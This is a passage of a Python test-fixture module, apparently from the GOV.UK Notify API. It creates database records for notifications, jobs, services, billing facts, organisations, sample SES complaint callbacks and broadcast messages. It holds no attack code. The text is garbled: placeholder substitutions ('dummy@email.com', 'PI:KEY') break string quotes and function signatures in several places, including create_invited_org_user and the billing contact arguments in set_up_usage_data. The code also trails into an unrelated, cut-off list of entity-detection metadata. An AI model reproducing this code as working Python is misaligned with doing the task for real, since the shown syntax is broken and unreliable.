sent_at = sent_at or datetime.utcnow()
updated_at = updated_at or datetime.utcnow()
if template.template_type == 'letter' and postage is None:
postage = 'second'
data = {
'id': id or uuid.uuid4(),
'job_id': job and job.id,
'job': job,
'service_id': template.service.id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'status': status,
'reference': reference,
'created_at': created_at,
'sent_at': sent_at,
'billable_units': billable_units,
'notification_type': template.template_type,
'api_key': api_key,
'api_key_id': api_key and api_key.id,
'key_type': api_key.key_type if api_key else key_type,
'sent_by': sent_by,
'updated_at': updated_at,
'client_reference': client_reference,
'job_row_number': job_row_number,
'rate_multiplier': rate_multiplier,
'international': international,
'phone_prefix': phone_prefix,
'created_by_id': created_by_id,
'postage': postage
}
notification_history = NotificationHistory(**data)
db.session.add(notification_history)
db.session.commit()
return notification_history
def create_job(
template,
notification_count=1,
created_at=None,
job_status='pending',
scheduled_for=None,
processing_started=None,
processing_finished=None,
original_file_name='some.csv',
archived=False,
contact_list_id=None,
):
data = {
'id': uuid.uuid4(),
'service_id': template.service_id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'original_file_name': original_file_name,
'notification_count': notification_count,
'created_at': created_at or datetime.utcnow(),
'created_by': template.created_by,
'job_status': job_status,
'scheduled_for': scheduled_for,
'processing_started': processing_started,
'processing_finished': processing_finished,
'archived': archived,
'contact_list_id': contact_list_id,
}
job = Job(**data)
dao_create_job(job)
return job
def create_service_permission(service_id, permission=EMAIL_TYPE):
dao_add_service_permission(
service_id if service_id else create_service().id, permission)
service_permissions = ServicePermission.query.all()
return service_permissions
def create_inbound_sms(
service,
notify_number=None,
user_number='447700900111',
provider_date=None,
provider_reference=None,
content='Hello',
provider=""mmg"",
created_at=None
):
if not service.inbound_number:
create_inbound_number(
# create random inbound number
notify_number or '07{:09}'.format(random.randint(0, 1e9 - 1)),
provider=provider,
service_id=service.id
)
inbound = InboundSms(
service=service,
created_at=created_at or datetime.utcnow(),
notify_number=service.get_inbound_number(),
user_number=user_number,
provider_date=provider_date or datetime.utcnow(),
provider_reference=provider_reference or 'foo',
content=content,
provider=provider
)
dao_create_inbound_sms(inbound)
return inbound
def create_service_inbound_api(
service,
url=""https://something.com"",
bearer_token=""some_super_secret"",
):
service_inbound_api = ServiceInboundApi(service_id=service.id,
url=url,
bearer_token=bearer_token,
updated_by_id=service.users[0].id
)
save_service_inbound_api(service_inbound_api)
return service_inbound_api
def create_service_callback_api(
service,
url=""https://something.com"",
bearer_token=""some_super_secret"",
callback_type=""delivery_status""
):
service_callback_api = ServiceCallbackApi(service_id=service.id,
url=url,
bearer_token=bearer_token,
updated_by_id=service.users[0].id,
callback_type=callback_type
)
save_service_callback_api(service_callback_api)
return service_callback_api
def create_email_branding(colour='blue', logo='test_x2.png', name='test_org_1', text='DisplayName'):
data = {
'colour': colour,
'logo': logo,
'name': name,
'text': text,
}
email_branding = EmailBranding(**data)
dao_create_email_branding(email_branding)
return email_branding
def create_rate(start_date, value, notification_type):
rate = Rate(
id=uuid.uuid4(),
valid_from=start_date,
rate=value,
notification_type=notification_type
)
db.session.add(rate)
db.session.commit()
return rate
def create_letter_rate(start_date=None, end_date=None, crown=True, sheet_count=1, rate=0.33, post_class='second'):
if start_date is None:
start_date = datetime(2016, 1, 1)
rate = LetterRate(
id=uuid.uuid4(),
start_date=start_date,
end_date=end_date,
crown=crown,
sheet_count=sheet_count,
rate=rate,
post_class=post_class
)
db.session.add(rate)
db.session.commit()
return rate
def create_api_key(service, key_type=KEY_TYPE_NORMAL, key_name=None):
id_ = uuid.uuid4()
name = key_name if key_name else '{} api key {}'.format(key_type, id_)
api_key = ApiKey(
service=service,
name=name,
created_by=service.created_by,
key_type=key_type,
id=id_,
secret=uuid.uuid4()
)
db.session.add(api_key)
db.session.commit()
return api_key
def create_inbound_number(number, provider='mmg', active=True, service_id=None):
inbound_number = InboundNumber(
id=uuid.uuid4(),
number=number,
provider=provider,
active=active,
service_id=service_id
)
db.session.add(inbound_number)
db.session.commit()
return inbound_number
def create_reply_to_email(
service,
email_address,
is_default=True,
archived=False
):
data = {
'service': service,
'email_address': email_address,
'is_default': is_default,
'archived': archived,
}
reply_to = ServiceEmailReplyTo(**data)
db.session.add(reply_to)
db.session.commit()
return reply_to
def create_service_sms_sender(
service,
sms_sender,
is_default=True,
inbound_number_id=None,
archived=False
):
data = {
'service_id': service.id,
'sms_sender': sms_sender,
'is_default': is_default,
'inbound_number_id': inbound_number_id,
'archived': archived,
}
service_sms_sender = ServiceSmsSender(**data)
db.session.add(service_sms_sender)
db.session.commit()
return service_sms_sender
def create_letter_contact(
service,
contact_block,
is_default=True,
archived=False
):
data = {
'service': service,
'contact_block': contact_block,
'is_default': is_default,
'archived': archived,
}
letter_content = ServiceLetterContact(**data)
db.session.add(letter_content)
db.session.commit()
return letter_content
def create_annual_billing(
service_id, free_sms_fragment_limit, financial_year_start
):
annual_billing = AnnualBilling(
service_id=service_id,
free_sms_fragment_limit=free_sms_fragment_limit,
financial_year_start=financial_year_start
)
db.session.add(annual_billing)
db.session.commit()
return annual_billing
def create_domain(domain, organisation_id):
domain = Domain(domain=domain, organisation_id=organisation_id)
db.session.add(domain)
db.session.commit()
return domain
def create_organisation(
name='test_org_1',
active=True,
organisation_type=None,
domains=None,
organisation_id=None,
purchase_order_number=None,
billing_contact_names=None,
billing_contact_email_addresses=None,
billing_reference=None,
):
data = {
'id': organisation_id,
'name': name,
'active': active,
'organisation_type': organisation_type,
'purchase_order_number': purchase_order_number,
'billing_contact_names': billing_contact_names,
'billing_contact_email_addresses': billing_contact_email_addresses,
'billing_reference': billing_reference,
}
organisation = Organisation(**data)
dao_create_organisation(organisation)
for domain in domains or []:
create_domain(domain, organisation.id)
return organisation
def create_invited_org_user(organisation, invited_by, dummy@email.com'):
invited_org_user = InvitedOrganisationUser(
email_address=email_address,
invited_by=invited_by,
organisation=organisation,
)
save_invited_org_user(invited_org_user)
return invited_org_user
def create_daily_sorted_letter(billing_day=None,
file_name=""Notify-20180118123.rs.txt"",
unsorted_count=0,
sorted_count=0):
daily_sorted_letter = DailySortedLetter(
billing_day=billing_day or date(2018, 1, 18),
file_name=file_name,
unsorted_count=unsorted_count,
sorted_count=sorted_count
)
db.session.add(daily_sorted_letter)
db.session.commit()
return daily_sorted_letter
def create_ft_billing(bst_date,
template,
*,
provider='test',
rate_multiplier=1,
international=False,
rate=0,
billable_unit=1,
notifications_sent=1,
postage='none'
):
data = FactBilling(bst_date=bst_date,
service_id=template.service_id,
template_id=template.id,
notification_type=template.template_type,
provider=provider,
rate_multiplier=rate_multiplier,
international=international,
rate=rate,
billable_units=billable_unit,
notifications_sent=notifications_sent,
postage=postage)
db.session.add(data)
db.session.commit()
return data
def create_ft_notification_status(
bst_date,
notification_type='sms',
service=None,
template=None,
job=None,
key_type='normal',
notification_status='delivered',
count=1
):
if job:
template = job.template
if template:
service = template.service
notification_type = template.template_type
else:
if not service:
service = create_service()
template = create_template(service=service, template_type=notification_type)
data = FactNotificationStatus(
bst_date=bst_date,
template_id=template.id,
service_id=service.id,
job_id=job.id if job else uuid.UUID(int=0),
notification_type=notification_type,
key_type=key_type,
notification_status=notification_status,
notification_count=count
)
db.session.add(data)
db.session.commit()
return data
def create_process_time(bst_date='2021-03-01', messages_total=35, messages_within_10_secs=34):
data = FactProcessingTime(
bst_date=bst_date,
messages_total=messages_total,
messages_within_10_secs=messages_within_10_secs
)
fact_processing_time_dao.insert_update_processing_time(data)
def create_service_guest_list(service, email_address=None, mobile_number=None):
if email_address:
guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, email_address)
elif mobile_number:
guest_list_user = ServiceGuestList.from_string(service.id, MOBILE_TYPE, mobile_number)
else:
guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, dummy@email.com')
db.session.add(guest_list_user)
db.session.commit()
return guest_list_user
def create_complaint(service=None,
notification=None,
created_at=None):
if not service:
service = create_service()
if not notification:
template = create_template(service=service, template_type='email')
notification = create_notification(template=template)
complaint = Complaint(notification_id=notification.id,
service_id=service.id,
ses_feedback_id=str(uuid.uuid4()),
complaint_type='abuse',
complaint_date=datetime.utcnow(),
created_at=created_at if created_at else datetime.now()
)
db.session.add(complaint)
db.session.commit()
return complaint
def ses_complaint_callback_malformed_message_id():
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""badMessageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_complaint_callback_with_missing_complaint_type():
""""""
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object
""""""
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_complaint_callback():
""""""
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object
""""""
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{""notificationType"":""Complaint"",""complaint"":{""complaintFeedbackType"": ""abuse"", ""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_notification_callback():
return '{\n ""Type"" : ""Notification"",\n ""MessageId"" : ""ref1"",' \
'\n ""TopicArn"" : ""arn:aws:sns:eu-west-1:123456789012:testing"",' \
'\n ""Message"" : ""{\\""notificationType\\"":\\""Delivery\\"",' \
'\\""mail\\"":{\\""timestamp\\"":\\""2016-03-14T12:35:25.909Z\\"",' \
'\\""source\\"":dummy@email.com"",' \
'\\""sourceArn\\"":\\""arn:aws:ses:eu-west-1:123456789012:identity/testing-notify\\"",' \
'\\""sendingAccountId\\"":\\""123456789012\\"",' \
'\\""messageId\\"":\\""ref1\\"",' \
'\\""destination\\"":dummy@email.com""]},' \
'\\""delivery\\"":{\\""timestamp\\"":\\""2016-03-14T12:35:26.567Z\\"",' \
'\\""processingTimeMillis\\"":658,' \
'\\""recipients\\"":dummy@email.com""],' \
'\\""smtpResponse\\"":\\""250 2.0.0 OK 1457958926 uo5si26480932wjc.221 - gsmtp\\"",' \
'\\""reportingMTA\\"":\\""a6-238.smtp-out.eu-west-1.amazonses.com\\""}}"",' \
'\n ""Timestamp"" : ""2016-03-14T12:35:26.665Z"",\n ""SignatureVersion"" : ""1"",' \
'\n ""Signature"" : ""X8d7eTAOZ6wlnrdVVPYanrAlsX0SMPfOzhoTEBnQqYkrNWTqQY91C0f3bxtPdUhUt' \
'PI:KEY' \
'PI:KEY' \
'PI:KEY"",' \
'\n ""SigningCertURL"" : ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750' \
'dd426d95ee9390147a5624348ee.pem"",' \
'\n ""UnsubscribeURL"" : ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S' \
'PI:KEY""\n}'
def create_service_data_retention(
service,
notification_type='sms',
days_of_retention=3
):
data_retention = insert_service_data_retention(
service_id=service.id,
notification_type=notification_type,
days_of_retention=days_of_retention
)
return data_retention
def create_invited_user(service=None,
to_email_address=None):
if service is None:
service = create_service()
if to_email_address is None:
to_email_address = dummy@email.com'
from_user = service.users[0]
data = {
'service': service,
'email_address': to_email_address,
'from_user': from_user,
'permissions': 'send_messages,manage_service,manage_api_keys',
'folder_permissions': [str(uuid.uuid4()), str(uuid.uuid4())]
}
invited_user = InvitedUser(**data)
save_invited_user(invited_user)
return invited_user
def create_template_folder(service, name='foo', parent=None):
tf = TemplateFolder(name=name, service=service, parent=parent)
db.session.add(tf)
db.session.commit()
return tf
def create_letter_branding(name='HM Government', filename='hm-government'):
test_domain_branding = LetterBranding(name=name,
filename=filename,
)
db.session.add(test_domain_branding)
db.session.commit()
return test_domain_branding
def set_up_usage_data(start_date):
year = int(start_date.strftime('%Y'))
one_week_earlier = start_date - timedelta(days=7)
two_days_later = start_date + timedelta(days=2)
one_week_later = start_date + timedelta(days=7)
one_month_later = start_date + timedelta(days=31)
# service with sms and letters:
service_1_sms_and_letter = create_service(
service_name='a - with sms and letter',
purchase_order_number=""service purchase order number"",
billing_contact_names=""service billing contact names"",
dummy@email.com dummy@email.com"",
billing_reference=""service billing reference""
)
letter_template_1 = create_template(service=service_1_sms_and_letter, template_type='letter')
sms_template_1 = create_template(service=service_1_sms_and_letter, template_type='sms')
create_annual_billing(
service_id=service_1_sms_and_letter.id, free_sms_fragment_limit=10, financial_year_start=year
)
org_1 = create_organisation(
name=""Org for {}"".format(service_1_sms_and_letter.name),
purchase_order_number=""org1 purchase order number"",
billing_contact_names=""org1 billing contact names"",
dummy@email.com dummy@email.com"",
billing_reference=""org1 billing reference""
)
dao_add_service_to_organisation(
service=service_1_sms_and_letter,
organisation_id=org_1.id
)
create_ft_billing(bst_date=one_week_earlier, template=sms_template_1, billable_unit=2, rate=0.11)
create_ft_billing(bst_date=start_date, template=sms_template_1, billable_unit=2, rate=0.11)
create_ft_billing(bst_date=two_days_later, template=sms_template_1, billable_unit=1, rate=0.11)
create_ft_billing(bst_date=one_week_later, template=letter_template_1,
notifications_sent=2, billable_unit=1, rate=.35, postage='first')
create_ft_billing(bst_date=one_month_later, template=letter_template_1,
notifications_sent=4, billable_unit=2, rate=.45, postage='second')
create_ft_billing(bst_date=one_week_later, template=letter_template_1,
notifications_sent=2, billable_unit=2, rate=.45, postage='second')
# service with emails only:
service_with_emails = create_service(service_name='b - emails')
email_template = create_template(service=service_with_emails, template_type='email')
org_2 = create_organisation(
name='Org for {}'.format(service_with_emails.name),
)
dao_add_service_to_organisation(service=service_with_emails, organisation_id=org_2.id)
create_ft_billing(bst_date=start_date, template=email_template, notifications_sent=10)
# service with letters:
service_with_letters = create_service(service_name='c - letters only')
letter_template_3 = create_template(service=service_with_letters, template_type='letter')
org_for_service_with_letters = create_organisation(
name=""Org for {}"".format(service_with_letters.name),
purchase_order_number=""org3 purchase order number"",
billing_contact_names=""org3 billing contact names"",
dummy@email.com dummy@email.com"",
billing_reference=""org3 billing reference""
)
dao_add_service_to_organisation(service=service_with_letters, organisation_id=org_for_service_with_letters.id)
create_ft_billing(bst_date=start_date, template=letter_template_3,
notifications_sent=2, billable_unit=3, rate=.50, postage='first')
create_ft_billing(bst_date=one_week_later, template=letter_template_3,
notifications_sent=8, billable_unit=5, rate=.65, postage='second')
create_ft_billing(bst_date=one_month_later, template=letter_template_3,
notifications_sent=12, billable_unit=5, rate=.65, postage='second')
# service with letters, without an organisation:
service_with_letters_without_org = create_service(service_name='d - service without org')
letter_template_4 = create_template(service=service_with_letters_without_org, template_type='letter')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=7, billable_unit=4, rate=1.55, postage='rest-of-world')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=8, billable_unit=4, rate=1.55, postage='europe')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=2, billable_unit=1, rate=.35, postage='second')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=1, billable_unit=1, rate=.50, postage='first')
# service with chargeable SMS, without an organisation
service_with_sms_without_org = create_service(
service_name='b - chargeable sms',
purchase_order_number=""sms purchase order number"",
billing_contact_names=""sms billing contact names"",
dummy@email.com dummy@email.com"",
billing_reference=""sms billing reference""
)
sms_template = create_template(service=service_with_sms_without_org, template_type='sms')
create_annual_billing(
service_id=service_with_sms_without_org.id, free_sms_fragment_limit=10, financial_year_start=year
)
create_ft_billing(bst_date=one_week_earlier, template=sms_template, rate=0.11, billable_unit=12)
create_ft_billing(bst_date=two_days_later, template=sms_template, rate=0.11)
create_ft_billing(bst_date=one_week_later, template=sms_template, billable_unit=2, rate=0.11)
# service with SMS within free allowance
service_with_sms_within_allowance = create_service(
service_name='e - sms within allowance'
)
sms_template_2 = create_template(service=service_with_sms_within_allowance, template_type='sms')
create_annual_billing(
service_id=service_with_sms_within_allowance.id, free_sms_fragment_limit=10, financial_year_start=year
)
create_ft_billing(bst_date=one_week_later, template=sms_template_2, billable_unit=2, rate=0.11)
# dictionary with services and orgs to return
return {
""org_1"": org_1,
""service_1_sms_and_letter"": service_1_sms_and_letter,
""org_2"": org_2,
""service_with_emails"": service_with_emails,
""org_for_service_with_letters"": org_for_service_with_letters,
""service_with_letters"": service_with_letters,
""service_with_letters_without_org"": service_with_letters_without_org,
""service_with_sms_without_org"": service_with_sms_without_org,
""service_with_sms_within_allowance"": service_with_sms_within_allowance,
}
def create_returned_letter(service=None, reported_at=None, notification_id=None):
if not service:
service = create_service(service_name='a - with sms and letter')
returned_letter = ReturnedLetter(
service_id=service.id,
reported_at=reported_at or datetime.utcnow(),
notification_id=notification_id or uuid.uuid4(),
created_at=datetime.utcnow(),
)
db.session.add(returned_letter)
db.session.commit()
return returned_letter
def create_service_contact_list(
service=None,
original_file_name='EmergencyContactList.xls',
row_count=100,
template_type='email',
created_by_id=None,
archived=False,
):
if not service:
service = create_service(service_name='service for contact list', user=create_user())
contact_list = ServiceContactList(
service_id=service.id,
original_file_name=original_file_name,
row_count=row_count,
template_type=template_type,
created_by_id=created_by_id or service.users[0].id,
created_at=datetime.utcnow(),
archived=archived,
)
db.session.add(contact_list)
db.session.commit()
return contact_list
def create_broadcast_message(
template=None,
*,
service=None, # only used if template is not provided
created_by=None,
personalisation=None,
content=None,
status=BroadcastStatusType.DRAFT,
starts_at=None,
finishes_at=None,
areas=None,
stubbed=False
):
if template:
service = template.service
template_id = template.id
template_version = template.version
personalisation = personalisation or {}
content = template._as_utils_template_with_personalisation(
personalisation
).content_with_placeholders_filled_in
elif content:
template_id = None
template_version = None
personalisation = None
content = content
else:
pytest.fail('Provide template or content')
broadcast_message = BroadcastMessage(
service_id=service.id,
template_id=template_id,
template_version=template_version,
personalisation=personalisation,
status=status,
starts_at=starts_at,
finishes_at=finishes_at,
created_by_id=created_by.id if created_by else service.created_by_id,
areas=areas or {'areas': [], 'simple_polygons': []},
content=content,
stubbed=stubbed
)
db.session.add(broadcast_message)
db.session.commit()
return broadcast_message
def create_broadcast_event(
broadcast_message,
sent_at=None,
message_type='alert',
transmitted_content=None,
transmitted_areas=None,
transmitted_sender=None,
transmitted_starts_at=None,
transmitted_finishes_at=None,
):
b_e = BroadcastEvent(
service=broadcast_message.service,
broadcast_message=broadcast_message,
sent_at=sent_at or datetime.utcnow(),
message_type=message_type,
transmitted_content=transmitted_content or {'body': 'this is an emergency broadcast message'},
transmitted_areas=transmitted_areas or broadcast_message.areas,
transmitted_sender=transmitted_sender or 'www.notifications.service.gov.uk',
transmitted_starts_at=transmitted_starts_at,
transmitted_finishes_at=transmitted_finishes_at or datetime.utcnow() + timedelta(hours=24),
)
db.session.add(b_e)
db.session.commit()
return b_e
def create_broadcast_provider_message(
broadcast_event,
provider,
status='sending'
):
broadcast_provider_message_id = uuid.uuid4()
provider_message = BroadcastProviderMessage(
id=broadcast_provider_message_id,
broadcast_event=broadcast_event,
provider=provider,
status=status,
)
db.session.add(provider_message)
db.session.commit()
provider_message_number = None
if provider == BroadcastProvider.VODAFONE:
provider_message_number = BroadcastProviderMessageNumber(
broadcast_provider_message_id=broadcast_provider_message_id)
db.session.add(provider_message_number)
db.session.commit()
return provider_message
def create_webauthn_credential(
user,
name='my key',
*,
credential_data='ABC123',
registration_response='DEF456',
):
webauthn_credential = WebauthnCredential(
user=user,
name=name,
credential_data=credential_data,
registration_response=registration_response
)
db.session.add(webauthn_credential)
db.session.commit()
return webauthn_credential
",41713,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['MEDICAL_LICENSE', 'ee9390147'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2021-03-01'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750'""], ['URL', ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S'""], ['DATE_TIME', 'LETTER_TYPE'], ['PERSON', 'ReturnedLetter'], ['LOCATION', 'save_model_user(user'], ['PERSON', 'crown=True'], ['PERSON', 'crown=crown'], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'to_field'], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'billable_units=1'], ['PERSON', 'service_id'], ['PERSON', 'create_inbound_sms'], ['LOCATION', 'service.inbound_number'], ['LOCATION', 'service_inbound_api'], ['PERSON', 'save_service_callback_api(service_callback_api'], ['PERSON', ""post_class='second""], ['PERSON', 'crown=crown'], ['LOCATION', 'create_api_key(service'], ['PERSON', ""provider='mmg""], ['PERSON', 'organisation_id'], ['LOCATION', 'sorted_count=0'], ['LOCATION', 'messages_total=35'], ['LOCATION', 'EMAIL_TYPE'], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', '2016-03-14T12:35:26.665Z"",\\n'], ['URL', 'dd426d95ee9390147a5624348ee.pe'], ['PERSON', 'invited_user = InvitedUser(**data'], ['DATE_TIME', 'year\n '], ['PERSON', 'org_1 = create_organisation'], ['LOCATION', 'billable_unit=3'], ['LOCATION', 'rate=.50'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'notifications_sent=7'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'rate=.50'], ['DATE_TIME', 'year\n '], ['DATE_TIME', 'year\n '], ['PERSON', 'ReturnedLetter'], ['NRP', 'contact_list'], ['PERSON', 'message_type=message_type'], ['LOCATION', 'broadcast_message.areas'], ['URL', 'https://something.com'], ['URL', 'https://something.com'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.jo'], ['URL', 'app.dao.no'], ['URL', 'app.dao.org'], ['URL', 'app.dao.pe'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.us'], ['URL', 'app.mo'], ['URL', 'email.com'], ['URL', 'User.query.fi'], ['URL', 'service.id'], ['URL', 'user.id'], ['URL', 'dao.se'], ['URL', 'Service.query.fi'], ['URL', 'email.com'], ['URL', 'service.cr'], ['URL', 'service.ac'], ['URL', 'service.re'], ['URL', 'service.co'], ['URL', 'service.us'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'inbound.id'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'sender.id'], ['URL', 'service.cr'], ['URL', 'template.ar'], ['URL', 'email.com'], ['URL', 'ApiKey.query.fi'], ['URL', 'ApiKey.se'], ['URL', 'template.se'], ['URL', 'ApiKey.ke'], ['URL', 'template.se'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'template.cr'], ['URL', 'ServicePermission.query.al'], ['URL', 'service.in'], ['URL', 'service.id'], ['URL', 'service.ge'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'x2.pn'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'organisation.id'], ['URL', 'email.com'], ['URL', 'Notify-20180118123.rs'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'service.id'], ['URL', 'job.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'dao.in'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'notification.id'], ['URL', 'service.id'], ['URL', 'datetime.no'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'a6-238.smtp-out.eu-west-1.amazonses.com'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'date.st'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letter.id'], ['URL', 'letter.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '1.id'], ['URL', 'emails.na'], ['URL', '2.id'], ['URL', 